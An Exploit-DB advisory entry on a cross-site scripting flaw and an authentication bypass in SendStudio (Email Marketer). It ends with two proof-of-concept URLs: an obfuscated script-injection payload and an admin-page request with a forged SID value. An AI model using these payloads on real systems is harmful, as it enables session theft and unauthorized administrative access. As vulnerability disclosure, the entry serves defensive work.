exploit-db-mirror/platforms/php/webapps/33450.txt
Offensive Security 5b5e154bd7 Updated 05_22_2014
2014-05-22 04:36:28 +00:00

15 lines
No EOL
727 B
Text
Executable file

source: http://www.securityfocus.com/bid/37554/info
SendStudio (also called Email Marketer) is prone to a cross-site scripting issue and a security-bypass issue.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site steal cookie-based authentication credentials and gain unauthorized administrative access to the affected application.
The vendor reports that Interspire Email Marketer 6 is not affected.
1- XSS (High)
http://www.example.com/wl-ssf41/admin/index.php/index?SID=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>
2- Bay Pass (Medium)
http://www.example.com/wl-ssf41/admin/index.php/index?SID=xx